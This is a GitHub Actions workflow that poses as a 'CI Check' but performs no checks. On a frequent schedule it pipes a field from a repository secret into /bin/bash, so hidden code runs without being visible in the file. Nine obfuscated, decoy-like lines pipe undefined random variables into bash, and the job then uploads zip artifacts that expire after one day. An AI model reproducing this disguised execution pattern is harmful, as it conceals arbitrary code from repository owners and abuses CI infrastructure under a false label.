name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '11 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          wg92: ${{ secrets.wg92 }}
        run: |
          printf '%s' "$wg92" | jq -r .apap8520 | /bin/bash
          echo $pnmf0 | jq -r .ru9779 | /bin/bash
          echo $lil9 | jq -r .orcig93742 | /bin/bash
          echo $znkr1778 | jq -r .tnw72903 | /bin/bash
          echo $ossg8 | jq -r .yvls957 | /bin/bash
          printf '%s' "$ous3" | jq -r .oswp178 | /bin/bash
          echo $rnhy6992 | jq -r .x73105 | /bin/bash
          printf '%s' "$tzp2" | jq -r .yrzez84563 | /bin/bash
          echo $dm6393 | jq -r .e6892 | /bin/bash
          echo $dnij15354 | jq -r .zqvjj4 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: qhN6XD49
          path: "*.zip"
          retention-days: 1
